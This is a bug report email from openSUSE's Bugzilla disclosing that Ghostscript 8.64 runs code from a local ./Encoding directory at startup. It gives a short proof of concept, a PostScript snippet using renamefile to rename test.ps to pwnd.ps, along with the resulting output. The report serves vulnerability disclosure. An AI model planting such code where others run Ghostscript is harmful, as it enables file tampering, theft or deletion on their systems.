Encoding/pwnd
http://bugzilla.novell.com/show_bug.cgi?id=608071 http://bugzilla.novell.com/show_bug.cgi?id=608071#c0 Summary: Ghostscript executes random code on startup Classification: openSUSE Product: openSUSE 11.2 Version: Final Platform: x86-64 OS/Version: openSUSE 11.2 Status: NEW Severity: Critical Priority: P5 - None Component: Printing AssignedTo: jsmeix@novell.com ReportedBy: giecrilj@stegny.2a.pl QAContact: jsmeix@novell.com Found By: --- Blocker: --- User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript configuration file that should not be treated as a configuration file at all. Steps 1 and 2 are needed only once; indeed, if you have ./Encoding/* for any reason, Ghostscript will execute code from there, and the results will range from annoying to pernicious. The example attack renames a single file; real haxorz are invited to read files or delete them. The script creates ./Encoding for demonstration purposes; if you happen to have any file in ./Encoding/ or $GS_LIB/Encoding, you are PWND each time you run gs. Reproducible: Always Steps to Reproduce: 1. mkdir Encoding 2. echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit' 3. gs Actual Results: GPL Ghostscript 8.64 (2009-02-03) Copyright (C) 2009 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file COPYING for details. PWND BY ARTIFEX HAXORZ While reading gs_fntem.ps: Error: /undefined in --quit-- Operand stack: (gs_fntem.ps) 1 FontEmulationProcs encodingnames --nostringval-- --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- DingbatsEncoding --nostringval-- DingbatsEncoding --nostringval-- StandardEncoding --nostringval-- ISOLatin1Encoding --nostringval-- SymbolEncoding --nostringval-- Wingdings pwnd pwnd Encoding Execution stack: %interp_exit --nostringval-- --nostringval-- --nostringval-- %array_continue --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push --nostringval-- 1831 17 5 %oparray_pop --nostringval-- --nostringval-- --dict:17/21(ro)(G)-- --dict:2/2(G)-- --nostringval-- 1 %dict_continue --nostringval-- --nostringval-- 1829 26 5 %oparray_pop findresource %errorexec_pop --nostringval-- --nostringval-- --nostringval-- --nostringval-- 1220188 pwnd 27 --nostringval-- --nostringval-- false 1 %stopped_push 1755 27 6 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- 1820 26 6 %oparray_pop 1754 26 6 %oparray_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- Dictionary stack: --dict:963/3371(G)-- --dict:0/20(G)-- --dict:63/200(L)-- --dict:963/3371(G)-- --dict:10/10(G)-- --dict:17/21(ro)(G)-- Current allocation mode is global The file test.ps is renamed to pwnd.ps Expected Results: Ghostscript should not read ./Encoding/* on startup and start normally. It should not rename any files (unless asked to do it by the user's script). Here is what Artifex has to say: We really do not care about the reporter's opinion or curiosity. A simple "Thank you" is sufficient. Any further comment on this bug report will result in the reporter's account being banned. You have been warned. <URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316> -- Configure bugmail: http://bugzilla.novell.com/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.